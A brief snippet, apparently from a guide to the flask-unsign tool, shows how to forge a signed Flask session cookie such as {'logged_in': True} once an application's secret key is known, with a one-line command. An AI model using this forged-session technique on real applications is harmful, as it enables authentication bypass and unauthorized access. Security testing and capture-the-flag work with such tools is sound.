Sign custom session data
masterOnce the secret key is known, use the --sign flag to craft a new, valid session cookie. You must provide the desired session data (as a Python dictionary string) via --cookie and the discovered secret key via --secret.
$ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'